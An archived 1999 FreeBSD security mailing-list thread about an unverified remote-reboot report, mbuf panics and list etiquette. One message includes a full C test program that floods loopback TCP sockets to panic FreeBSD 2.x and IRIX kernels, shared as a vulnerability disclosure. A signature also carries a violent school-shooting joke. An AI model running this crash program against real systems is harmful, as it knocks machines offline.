<4.2.0.37.19990504212515.045d3100@localhost> <3730A208.75596C9B@softweyr.com> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org : ... garbage removed. This is getting ridiculous. You guys are feeding off your own detritus. Just because the information as imparted is not useful doesn't mean the poster intended to instigate FUD. Saying the information is not useful is fine. Shooting bazookas at him over a single nicely ( if unhelpful ) worded email is just being stupid. The best response to this sort of thing is to be professional, that way you win both ways. -Matt Matthew Dillon To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 5 13:11:29 1999 Delivered-To: freebsd-security@freebsd.org Received: from lariat.lariat.org (lariat.lariat.org [206.100.185.2]) by hub.freebsd.org (Postfix) with ESMTP id BE98E14DAA for ; Wed, 5 May 1999 13:11:20 -0700 (PDT) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.lariat.org [206.100.185.2]) by lariat.lariat.org (8.9.3/8.9.3) with ESMTP id OAA25401; Wed, 5 May 1999 14:11:05 -0600 (MDT) Message-Id: <4.2.0.37.19990505140848.0458b850@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.0.37 (Beta) Date: Wed, 05 May 1999 14:10:59 -0600 To: Wes Peters From: Brett Glass Subject: Re: [Jamie Rishaw ] FreeBSD 3.1 remote reboot exploit Cc: Jacob Zehnder , security@FreeBSD.ORG, jamie@exodus.net In-Reply-To: <3730A208.75596C9B@softweyr.com> References: <4.2.0.37.19990504212515.045d3100@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 01:54 PM 5/5/99 -0600, Wes Peters wrote: >The fact that no information whatsoever was included in the post points >out that the poster had no intention of helping in any way. What his >motiviations for this are we cannot tell. I would certainly be curious. One doesn't gain prestige by posting an unverifiable report, and the degree of FUD generated by one unverified report is not significant. --Brett Glass To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 5 13:13: 1 1999 Delivered-To: freebsd-security@freebsd.org Received: from lariat.lariat.org (lariat.lariat.org [206.100.185.2]) by hub.freebsd.org (Postfix) with ESMTP id B0FE714DC5 for ; Wed, 5 May 1999 13:12:58 -0700 (PDT) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.lariat.org [206.100.185.2]) by lariat.lariat.org (8.9.3/8.9.3) with ESMTP id OAA25439; Wed, 5 May 1999 14:12:35 -0600 (MDT) Message-Id: <4.2.0.37.19990505141135.0454f510@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.0.37 (Beta) Date: Wed, 05 May 1999 14:12:26 -0600 To: Matthew Dillon , Wes Peters , Jacob Zehnder From: Brett Glass Subject: Re: [Jamie Rishaw ] FreeBSD 3.1 remotereboot exploit Cc: security@FreeBSD.ORG In-Reply-To: <199905052006.NAA28216@apollo.backplane.com> References: <4.2.0.37.19990504212515.045d3100@localhost> <3730A208.75596C9B@softweyr.com> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Actually, Matt, you have taken the proper professional action. There's not much else to be done until you get a response... or don't. --Brett At 01:06 PM 5/5/99 -0700, Matthew Dillon wrote: >: ... garbage removed. > > This is getting ridiculous. You guys are feeding off your own detritus. > Just because the information as imparted is not useful doesn't mean the > poster intended to instigate FUD. Saying the information is not useful > is fine. Shooting bazookas at him over a single nicely ( if unhelpful ) > worded email is just being stupid. The best response to this sort of thing > is to be professional, that way you win both ways. > > -Matt > Matthew Dillon > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 5 13:24:14 1999 Delivered-To: freebsd-security@freebsd.org Received: from xylan.com (postal.xylan.com [208.8.0.248]) by hub.freebsd.org (Postfix) with ESMTP id 85BC814D09; Wed, 5 May 1999 13:24:09 -0700 (PDT) (envelope-from wes@softweyr.com) Received: from mailhub.xylan.com by xylan.com (8.8.7/SMI-SVR4 (xylan-mgw 2.2 [OUT])) id NAA17965; Wed, 5 May 1999 13:23:33 -0700 (PDT) Received: from omni.xylan.com by mailhub.xylan.com (SMI-8.6/SMI-SVR4 (mailhub 2.1 [HUB])) id NAA19609; Wed, 5 May 1999 13:23:33 -0700 Received: from softweyr.com (dyn5.utah.xylan.com) by omni.xylan.com (4.1/SMI-4.1 (xylan engr [SPOOL])) id AA07831; Wed, 5 May 99 13:23:26 PDT Message-Id: <3730A8B6.57370408@softweyr.com> Date: Wed, 05 May 1999 14:23:18 -0600 From: Wes Peters Organization: Softweyr LLC X-Mailer: Mozilla 4.5 [en] (X11; U; FreeBSD 3.1-RELEASE i386) X-Accept-Language: en Mime-Version: 1.0 To: Jorge Aldana Cc: freebsd-stable@FreeBSD.ORG, security@FreeBSD.ORG Subject: Re: FreeBSD 3.1 remote reboot exploit (fwd) References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Jorge Aldana wrote: > > It seems from the responses that this is an acceptable symptom of FreeBSD > 3.1 (release and stable)? No. The responses indicate this had become a well-known problem in 3.1-RELEASE and has been fixed in -STABLE for quite some time. -- "Where am I, and what am I doing in this handbasket?" Wes Peters Softweyr LLC http://www.softweyr.com/~softweyr wes@softweyr.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 5 13:37:28 1999 Delivered-To: freebsd-security@freebsd.org Received: from delenn.acm.rpi.edu (delenn.acm.rpi.edu [128.213.5.14]) by hub.freebsd.org (Postfix) with SMTP id 98C6B1545B for ; Wed, 5 May 1999 13:37:16 -0700 (PDT) (envelope-from slk@acm.rpi.edu) Received: (qmail 28385 invoked by uid 1120); 5 May 1999 20:37:16 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 5 May 1999 20:37:16 -0000 Date: Wed, 5 May 1999 16:37:15 -0400 (EDT) From: Simon Karpen To: Mike Smith Cc: Raymond Wiker , freebsd-stable@FreeBSD.ORG, security@FreeBSD.ORG Subject: Re: FreeBSD 3.1 remote reboot exploit (fwd) In-Reply-To: <199905051830.LAA01118@dingo.cdrom.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org [me: VM86 + VESA = reboot] On Wed, 5 May 1999, Mike Smith wrote: > > Naturally, it'd be really handy if you actually qualified what it is > about these that cause your system to reboot. I'd be very dubious > about the simple presence of either of these items causing random > reboots, and the dearth of supporting information you've offered makes > it much harder to help you. Right now I'm preparing to ship the box, so I can't do any more detailed testing. Once it's in its new location next week (think end of semester), I'll do much more extensive testing. The only other piece of info I can give right now is that Realplayer/Linux plaing a high bitrate file was a good way to speed up the crash. Try VESA+VM86 in your kernel, boot up with a 640x480 splashscreen, and play stuff using Realplayer/Linux for half an hour or so. (maybe an hour or two) I'd be quite surprised if you didn't get a reboot. --Simon -- Simon Karpen karpes@rpi.edu slk@acm.rpi.edu #include I don't speak for RPI in any way. "Those that give up essential liberty to obtain a little temporary safety, deserve neither liberty nor safety." --Ben Franklin To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 5 14: 5:15 1999 Delivered-To: freebsd-security@freebsd.org Received: from dingo.cdrom.com (dingo.cdrom.com [204.216.28.145]) by hub.freebsd.org (Postfix) with ESMTP id 70588159E6; Wed, 5 May 1999 14:04:42 -0700 (PDT) (envelope-from mike@dingo.cdrom.com) Received: from dingo.cdrom.com (localhost.cdrom.com [127.0.0.1]) by dingo.cdrom.com (8.9.3/8.8.8) with ESMTP id OAA02308; Wed, 5 May 1999 14:02:58 -0700 (PDT) (envelope-from mike@dingo.cdrom.com) Message-Id: <199905052102.OAA02308@dingo.cdrom.com> X-Mailer: exmh version 2.0.2 2/24/98 To: Simon Karpen Cc: Mike Smith , Raymond Wiker , freebsd-stable@FreeBSD.ORG, security@FreeBSD.ORG Subject: Re: FreeBSD 3.1 remote reboot exploit (fwd) In-reply-to: Your message of "Wed, 05 May 1999 16:37:15 EDT." Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Wed, 05 May 1999 14:02:58 -0700 From: Mike Smith Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > [me: VM86 + VESA = reboot] > > On Wed, 5 May 1999, Mike Smith wrote: > > > > Naturally, it'd be really handy if you actually qualified what it is > > about these that cause your system to reboot. I'd be very dubious > > about the simple presence of either of these items causing random > > reboots, and the dearth of supporting information you've offered makes > > it much harder to help you. > > Right now I'm preparing to ship the box, so I can't do any more > detailed testing. > > Once it's in its new location next week (think end of semester), > I'll do much more extensive testing. > > The only other piece of info I can give right now is that Realplayer/Linux > plaing a high bitrate file was a good way to speed up the crash. > > Try VESA+VM86 in your kernel, boot up with a 640x480 splashscreen, > and play stuff using Realplayer/Linux for half an hour or so. > (maybe an hour or two) I'd be quite surprised if you didn't get a reboot. I'd be much more interested in any sort of logical thread you can string between these datapoints. I boot with an 800x600 splash on my laptop, which I then pound to death in various other ways, but (modulo timecounter braindeath) it's 100% stable. -- \\ Sometimes you're ahead, \\ Mike Smith \\ sometimes you're behind. \\ mike@smith.net.au \\ The race is long, and in the \\ msmith@freebsd.org \\ end it's only with yourself. \\ msmith@cdrom.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 5 14:45:46 1999 Delivered-To: freebsd-security@freebsd.org Received: from angel.double-barrel.be (mail.double-barrel.be [194.7.102.22]) by hub.freebsd.org (Postfix) with ESMTP id 5884F14BE7 for ; Wed, 5 May 1999 14:45:37 -0700 (PDT) (envelope-from mvergall@double-barrel.be) Received: from double-barrel.be (ws1.double-barrel.be [194.7.102.29]) by angel.double-barrel.be (8.9.1b+Sun/8.9.1) with ESMTP id XAA01516; Wed, 5 May 1999 23:44:51 +0200 (MET DST) Message-ID: <3730BC13.9EA40ED9@double-barrel.be> Date: Wed, 05 May 1999 23:45:55 +0200 From: "Michael C. Vergallen" X-Mailer: Mozilla 4.51 [en] (X11; I; SunOS 5.7 sun4m) X-Accept-Language: en MIME-Version: 1.0 To: CyberPsychotic Cc: freebsd-security@freebsd.org, "Michael C. Vergallen" Subject: Re: FreeBSD 3.1 remote reboot exploit (fwd) References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org CyberPsychotic wrote: > hmm.. depends on how you did that. Assuming from the other reports people > send to the list, I believe the problem appears on tcp/ip level _maybe_ with > some specific kernel options turned on. I've played with a friend's of mine > machine bombing it with various sorts of maliformed tcp/udp and just sick ip > datagrams but wasn't able to reproduce this. If anyone expirienced the > problem wouldn't mind to share their log files/network traffic dump, I would > appreciate that. I 've been genrating packets of different sizes and only ones have I managed to lock the box up while transfering a 1 GB image file and pulling the cable to the disc-crate by accident. Michael To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 5 14:56:25 1999 Delivered-To: freebsd-security@freebsd.org Received: from angel.double-barrel.be (mail.double-barrel.be [194.7.102.22]) by hub.freebsd.org (Postfix) with ESMTP id D264715047; Wed, 5 May 1999 14:56:11 -0700 (PDT) (envelope-from mvergall@double-barrel.be) Received: from double-barrel.be (ws1.double-barrel.be [194.7.102.29]) by angel.double-barrel.be (8.9.1b+Sun/8.9.1) with ESMTP id XAA01521; Wed, 5 May 1999 23:54:57 +0200 (MET DST) Message-ID: <3730BE71.B1D7B36F@double-barrel.be> Date: Wed, 05 May 1999 23:56:01 +0200 From: "Michael C. Vergallen" X-Mailer: Mozilla 4.51 [en] (X11; I; SunOS 5.7 sun4m) X-Accept-Language: en MIME-Version: 1.0 To: Seth Cc: "Michael C. Vergallen" , Tim Priebe , Greg Quinlan , freebsd-stable@FreeBSD.ORG, security@FreeBSD.ORG Subject: Re: FreeBSD 3.1 remote reboot exploit (fwd) References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Seth wrote: > Just out of curiosity, how were you attempting to remotely reboot your ftp > server? > Sending large packets , incomplete packets, small packets etc. I also only seen a FreeBSD box panic ones that is when I tripped on my server's cabling and pulled the Host adapter cable loose from the disc crate that was when I was transfering a large 1 GB file as a test to see if the TCP stack was upto scratch. Now the system paniced when trying to flush a block to disc.. Michael To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 5 15:49:58 1999 Delivered-To: freebsd-security@freebsd.org Received: from rage.arpa.com (rage.arpa.com [199.245.173.3]) by hub.freebsd.org (Postfix) with ESMTP id D89E214E60; Wed, 5 May 1999 15:49:49 -0700 (PDT) (envelope-from jamie@rage.arpa.com) Received: (from jamie@localhost) by rage.arpa.com (8.9.3/8.9.3) id RAA43154; Wed, 5 May 1999 17:48:33 -0500 (CDT) Date: Wed, 5 May 1999 17:48:32 -0500 From: Jamie Rishaw To: Karl Denninger Cc: chris@calldei.com, "Jordan K. Hubbard" , Mike Smith , Seth , freebsd-stable@FreeBSD.ORG, security@FreeBSD.ORG, jamie@exodus.net Subject: Re: FreeBSD 3.1 remote reboot exploit (fwd) Message-ID: <19990505174832.A41704@rage.arpa.com> References: <199905040140.SAA01305@dingo.cdrom.com> <30986.925789368@zippy.cdrom.com> <19990503225131.I10291@holly.dyndns.org> <19990503231813.A11570@Denninger.Net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.4i In-Reply-To: <19990503231813.A11570@Denninger.Net>; from Karl Denninger on Mon, May 03, 1999 at 11:18:13PM -0500 X-No-Archive: Yes X-Face: d=) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Actually, I'm not on any fbsd mail lists, and I'm in the process of moving from Chicago to LA. This is the first time I've been on my mail in quite a while. (Days). I'll get a tcpdump some time when I can get someone to reset a box, but it's not exactly on my list of priorities to have production boxen of mine rebooted mid-stream. I'm perhaps the biggest fbsd proponent in my company.. I did not intend to slander or annoy anyone,. rather, to get people out trying to figure out what the exploit is, and get to work. For everyone's info, the boxen were rebooted first, then responsibility was claimed later. I didn't know of these attacks until after they were done. As far as "the second machine", the second machine is one of several machiens. The second machine is in a different physical location, different backbone, different hardware. It does about two megabits/sec, so running a blind "tcpdump" is really not possible. Any flames from this will be /dev/null'd. I'm not out to fight with anyone about anything. No time. -jamie On Mon, May 03, 1999 at 11:18:13PM -0500, Karl Denninger wrote: > On Mon, May 03, 1999 at 10:51:32PM -0500, Chris Costello wrote: > > On Mon, May 3, 1999, Jordan K. Hubbard wrote: > > > > I have to say that Jamie really let us down by not running a raw > > > > tcpdump alongside the second targetted machine here. Any chance of > > > > provoking these people into "demonstrating" the exploit on a machine, > > > > while another connected to the same wire is running > > > > > > I'd say he or whomever first reported this to bugtraq let us down even > > > more by releasing an "advisory" in such an unknown and unverifyable > > > state. By doing so, all they've done is hand ammunition to the FUD > > > corps and given us no reasonable chance to respond since the advisory > > > > I get the impression that that was the whole point of the > > bugtraq post, to give us more grief. > > Ding! > > Give that man a cigar. > > Anyone who saw this done to one machine and didn't *immediately* configure > machine #2 to trap and trace on the second instance deserves raspberries - > at a minimum. > > Its one thing to have it done "anyonmously" (among other things you might > not be there when it goes "boom" under those conditions!) Its another to > have it done under controlled conditions and neither get an explanantion > OR trap the condition that caused it yourself with a tcpdump trace. > > -- > -- > Karl Denninger (karl@denninger.net) Web: fathers.denninger.net > I ain't even *authorized* to speak for anyone other than myself, so give > up now on trying to associate my words with any particular organization. -- jamie rishaw "Ammo, 200 rounds: $75. Semi-Automatic Rifle: $675. Ski-Mask: $10. Kenneth Cole Trench Coat: $400. Look on classmate's face just before you blow his brains out: Priceless. .. In the Colorado school system, you can risk losing your life, but they don't take any card from American Express. Visa -- it's everywhere you want to be." To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 5 16:16: 6 1999 Delivered-To: freebsd-security@freebsd.org Received: from gatekeeper.tsc.tdk.com (gatekeeper.tsc.tdk.com [207.113.159.21]) by hub.freebsd.org (Postfix) with ESMTP id 9DE1B14E77 for ; Wed, 5 May 1999 16:16:03 -0700 (PDT) (envelope-from gdonl@tsc.tdk.com) Received: from sunrise.gv.tsc.tdk.com (root@sunrise.gv.tsc.tdk.com [192.168.241.191]) by gatekeeper.tsc.tdk.com (8.8.8/8.8.8) with ESMTP id QAA22419; Wed, 5 May 1999 16:16:00 -0700 (PDT) (envelope-from gdonl@tsc.tdk.com) Received: from salsa.gv.tsc.tdk.com (salsa.gv.tsc.tdk.com [192.168.241.194]) by sunrise.gv.tsc.tdk.com (8.8.5/8.8.5) with ESMTP id QAA25795; Wed, 5 May 1999 16:15:59 -0700 (PDT) Received: (from gdonl@localhost) by salsa.gv.tsc.tdk.com (8.8.5/8.8.5) id QAA10024; Wed, 5 May 1999 16:15:57 -0700 (PDT) From: Don Lewis Message-Id: <199905052315.QAA10024@salsa.gv.tsc.tdk.com> Date: Wed, 5 May 1999 16:15:57 -0700 In-Reply-To: The Tech-Admin Dude "Re: freebsd mbuf crash" (May 5, 12:35am) X-Mailer: Mail User's Shell (7.2.6 alpha(3) 7/19/95) To: The Tech-Admin Dude , Don Lewis Subject: Re: freebsd mbuf crash Cc: freebsd-security@FreeBSD.ORG Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On May 5, 12:35am, The Tech-Admin Dude wrote: } Subject: Re: freebsd mbuf crash } Raise NMBCLUSTERS in kernel config file That's the fix for FreeBSD panics caused by running out of mbuf clusters. The exploit code that was posted triggered a bug in the IP reassembly code that was present in 3.0 between August and October last year (ip_input.c versions 1.100 through 1.102). To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 5 16:25:52 1999 Delivered-To: freebsd-security@freebsd.org Received: from wrath.cs.utah.edu (wrath.cs.utah.edu [155.99.198.100]) by hub.freebsd.org (Postfix) with ESMTP id EA77F152F2 for ; Wed, 5 May 1999 16:25:48 -0700 (PDT) (envelope-from danderse@cs.utah.edu) Received: from torrey.cs.utah.edu (torrey.cs.utah.edu [155.99.212.91]) by wrath.cs.utah.edu (8.8.8/8.8.8) with ESMTP id RAA11629; Wed, 5 May 1999 17:25:47 -0600 (MDT) Received: (from danderse@localhost) by torrey.cs.utah.edu (8.9.1/8.9.1) id RAA05598; Wed, 5 May 1999 17:25:46 -0600 (MDT) (envelope-from danderse@cs.utah.edu) MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Date: Wed, 5 May 1999 17:25:46 -0600 (MDT) From: "David G. Andersen" To: Don Lewis Cc: The Tech-Admin Dude , freebsd-security@FreeBSD.ORG, bugtraq@netspace.org Subject: Re: freebsd mbuf crash In-Reply-To: Don Lewis's message of Wed, May 5 1999 <199905052315.QAA10024@salsa.gv.tsc.tdk.com> References: <199905052315.QAA10024@salsa.gv.tsc.tdk.com> X-Mailer: VM 6.43 under 20.4 "Emerald" XEmacs Lucid Message-ID: <14128.53675.396459.783894@torrey.cs.utah.edu> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org There's another fairly easy way to exploit this on pre-3.0 systems, as an aside, but it requires either a fairly slow server process (or one which you can force to block), or local access. The process is simple: connect send a big chunk of data which causes the TCP socket buffers to fill up before the remote process read()s it panic(). I was going to send out a note about this, but since it's fixed in 3.0ish systems, never bothered. But while we're on the topic, there you go. The bug was actually pointed out in an indirect way by the author of a paper at sigcomm, who noticed the phenomenon in NetBSD while they were rewriting the buffer management routines. I just wrote a small test program for it, and found they were right. It also seems to affect IRIX systems, resulting in a hung system. Test program (for local users) is at the end of this message. It creates a socket, listen()s on it, and does nothing. The other process connects to this socket, and sends a bunch of junk. I tested it against an early, early version of 3.0-current, and it appeared to be fixed. Linux and AIX proved happy with it. Never got around to trying it on a Solaris box. CC:'d to bugtraq, since it does affect IRIX too. -Dave Lo and Behold, Don Lewis said: > On May 5, 12:35am, The Tech-Admin Dude wrote: > } Subject: Re: freebsd mbuf crash > } Raise NMBCLUSTERS in kernel config file > > That's the fix for FreeBSD panics caused by running out of mbuf clusters. > > The exploit code that was posted triggered a bug in the IP reassembly code > that was present in 3.0 between August and October last year (ip_input.c > versions 1.100 through 1.102). > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > -- work: danderse@cs.utah.edu me: angio@pobox.com University of Utah http://www.angio.net/ Computer Science - Flux Research Group "What's footnote FIVE?" /* Test program for TCP buffer overflow mbuf panic */ /* Dave Andersen - danderse@cs.utah.edu */ /* netbuf.c - gcc netbuf.c -o netbuf */ #include #include #include #include #include #define MAXSOCK 500 #define MY_BUFSIZE 32768 #define MAGICPORT 29833 #ifndef INADDR_LOOPBACK #define INADDR_LOOPBACK 0x7f000001 #endif /* * Compiling: * FreeBSD, AIX: -DHAS_SIN_LEN * Linux, IRIX: */ /* * Vulnerable: * FreeBSD-2.x * IRIX * Not vulnerable: * FreeBSD-3.0 * Linux 2.0.30 * AIX 4.1 */ struct sockaddr_in socka; void doecho() { int ls; ls = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); bind(ls, &socka, sizeof(socka)); listen(ls, MAXSOCK); while (1) { sleep(1); } } int main(int argc, char **argv) { int kidpid; int sendsock[MAXSOCK], recvsock[MAXSOCK]; int i; int sock; int socksize; char buf[MY_BUFSIZE]; socksize = 1048576; bzero(&socka, sizeof(socka)); socka.sin_addr.s_addr = htonl(INADDR_LOOPBACK); #ifdef HAS_SIN_LEN socka.sin_len = sizeof(struct sockaddr_in); #endif socka.sin_family = AF_INET ; socka.sin_port = htons(MAGICPORT); kidpid = fork(); if (kidpid > 0) { doecho(); } else { /* A vague, horrible excuse for synchronization. This * is a demonstration of a kernel flaw, not good coding * style. :-) */ sleep(2); } for (i = 0; i < MAXSOCK; i++) { /* Open the socket connection, set the socket option */ sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); setsockopt(sock, SOL_SOCKET, SO_SNDBUF, &socksize, sizeof(socksize)); sendsock[i] = sock; if (connect(sock, &socka, sizeof(socka))) { perror("could not connect"); } printf("Opened\n"); } printf("Starting the loop\n"); while (1) { for (i = 0; i < MAXSOCK; i++) write(sendsock[i], buf, MY_BUFSIZE); } } To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 5 16:47:46 1999 Delivered-To: freebsd-security@freebsd.org Received: from gatekeeper.tsc.tdk.com (gatekeeper.tsc.tdk.com [207.113.159.21]) by hub.freebsd.org (Postfix) with ESMTP id C47D614F81 for ; Wed, 5 May 1999 16:47:39 -0700 (PDT) (envelope-from gdonl@tsc.tdk.com) Received: from sunrise.gv.tsc.tdk.com (root@sunrise.gv.tsc.tdk.com [192.168.241.191]) by gatekeeper.tsc.tdk.com (8.8.8/8.8.8) with ESMTP id QAA22856; Wed, 5 May 1999 16:47:36 -0700 (PDT) (envelope-from gdonl@tsc.tdk.com) Received: from salsa.gv.tsc.tdk.com (salsa.gv.tsc.tdk.com [192.168.241.194]) by sunrise.gv.tsc.tdk.com (8.8.5/8.8.5) with ESMTP id QAA26024; Wed, 5 May 1999 16:47:35 -0700 (PDT) Received: (from gdonl@localhost) by salsa.gv.tsc.tdk.com (8.8.5/8.8.5) id QAA10103; Wed, 5 May 1999 16:47:34 -0700 (PDT) From: Don Lewis Message-Id: <199905052347.QAA10103@salsa.gv.tsc.tdk.com> Date: Wed, 5 May 1999 16:47:34 -0700 In-Reply-To: Don Lewis "Re: freebsd mbuf crash" (May 5, 4:15pm) X-Mailer: Mail User's Shell (7.2.6 alpha(3) 7/19/95) To: Don Lewis , The Tech-Admin Dude Subject: Re: freebsd mbuf crash Cc: freebsd-security@FreeBSD.ORG Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On May 5, 4:15pm, Don Lewis wrote: } Subject: Re: freebsd mbuf crash } On May 5, 12:35am, The Tech-Admin Dude wrote: } } Subject: Re: freebsd mbuf crash } } Raise NMBCLUSTERS in kernel config file } } That's the fix for FreeBSD panics caused by running out of mbuf clusters. } } The exploit code that was posted triggered a bug in the IP reassembly code } that was present in 3.0 between August and October last year (ip_input.c } versions 1.100 through 1.102). I retract this statement. At first I thought the code was the nestea2 exploit from late last year, but I now believe it is a different exploit. It's use of a large number of IP options and fragmented TCP packets makes it resemble a potential way of sneaking TCP packets through a packet filtering firewall that filters by port numbers by overlaying the fragments so that the desired port number in the second fragment overwrites the port number in the first fragment that the firewall allowed through (but FreeBSD's IP reassembly algorithm never allowed FreeBSD to be attacked in this manner as an end system, so far as I know). This isn't what the code is trying to exploit, though. It's probably something related to fragment reassembly, IP option processing, or the sending of TCP RSTs in response to unsolicitied packets. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 5 18:52:16 1999 Delivered-To: freebsd-security@freebsd.org Received: from xylan.com (postal.xylan.com [208.8.0.248]) by hub.freebsd.org (Postfix) with ESMTP id B4D86158DC for ; Wed, 5 May 1999 18:52:14 -0700 (PDT) (envelope-from wes@softweyr.com) Received: from mailhub.xylan.com by xylan.com (8.8.7/SMI-SVR4 (xylan-mgw 2.2 [OUT])) id SAA22112; Wed, 5 May 1999 18:51:34 -0700 (PDT) Received: from omni.xylan.com by mailhub.xylan.com (SMI-8.6/SMI-SVR4 (mailhub 2.1 [HUB])) id SAA11030; Wed, 5 May 1999 18:51:35 -0700 Received: from softweyr.com (dyn5.utah.xylan.com) by omni.xylan.com (4.1/SMI-4.1 (xylan engr [SPOOL])) id AA23421; Wed, 5 May 99 18:51:32 PDT Message-Id: <3730F5A4.D3BE532B@softweyr.com> Date: Wed, 05 May 1999 19:51:32 -0600 From: Wes Peters Organization: Softweyr LLC X-Mailer: Mozilla 4.5 [en] (X11; U; FreeBSD 3.1-RELEASE i386) X-Accept-Language: en Mime-Version: 1.0 To: Jamie Rishaw Cc: security@FreeBSD.ORG, jamie@exodus.net Subject: Re: FreeBSD 3.1 remote reboot exploit (fwd) References: <199905040140.SAA01305@dingo.cdrom.com> <30986.925789368@zippy.cdrom.com> <19990503225131.I10291@holly.dyndns.org> <19990503231813.A11570@Denninger.Net> <19990505174832.A41704@rage.arpa.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Jamie Rishaw wrote: > > Actually, I'm not on any fbsd mail lists, and I'm in the process > of moving from Chicago to LA. This is the first time I've been on > my mail in quite a while. (Days). > > I'll get a tcpdump some time when I can get someone to reset a > box, but it's not exactly on my list of priorities to have production > boxen of mine rebooted mid-stream. Thank you. Any help you can give, tcpdump, kernel stack backtrace, or a core file will help. > I'm perhaps the biggest fbsd proponent in my company.. I did not > intend to slander or annoy anyone,. rather, to get people out trying > to figure out what the exploit is, and get to work. As we have learned. The speculation about your motives was unnecessary. > -- > jamie rishaw > "Ammo, 200 rounds: $75. Semi-Automatic Rifle: $675. Ski-Mask: $10. Kenneth Cole > Trench Coat: $400. Look on classmate's face just before you blow his brains > out: Priceless. .. In the Colorado school system, you can risk losing your > life, but they don't take any card from American Express. Visa -- it's > everywhere you want to be." Is this in any way related to my .sig? ;^) -- "Where am I, and what am I doing in this handbasket?" Wes Peters Softweyr LLC http://www.softweyr.com/~softweyr wes@softweyr.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 6 3: 1: 5 1999 Delivered-To: freebsd-security@freebsd.org Received: from ns1x.pvt.net (ns.pvt.net [194.149.105.18]) by hub.freebsd.org (Postfix) with ESMTP id 664A014FED for ; Thu, 6 May 1999 03:01:02 -0700 (PDT) (envelope-from papezik@pvt.net) Received: from mail1.pvt.net (news.pvtnet.cz [194.149.101.166]) by ns1x.pvt.net (8.9.3/8.9.3) with ESMTP id MAA29189; Thu, 6 May 1999 12:01:01 +0200 Received: from pvt.net (papezik.pvt.net [194.149.103.213]) by mail1.pvt.net (8.9.3/8.9.3) with ESMTP id MAA81500; Thu, 6 May 1999 12:00:59 +0200 (CEST) Message-ID: <3731686E.977E324A@pvt.net> Date: Thu, 06 May 1999 12:01:18 +0200 From: Papezik Milon X-Mailer: Mozilla 4.51 [en] (X11; I; FreeBSD 3.0-RELEASE i386) X-Accept-Language: cs, cz, sk, en MIME-Version: 1.0 To: "David G. Andersen" Cc: freebsd-security@FreeBSD.ORG Subject: Re: freebsd mbuf crash References: <199905052315.QAA10024@salsa.gv.tsc.tdk.com> <14128.53675.396459.783894@torrey.cs.utah.edu> Content-Type: text/plain; charset=iso-8859-2 Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org "David G. Andersen" wrote: > > CC:'d to bugtraq, since it does affect IRIX too. I've tried your example code on IRIX 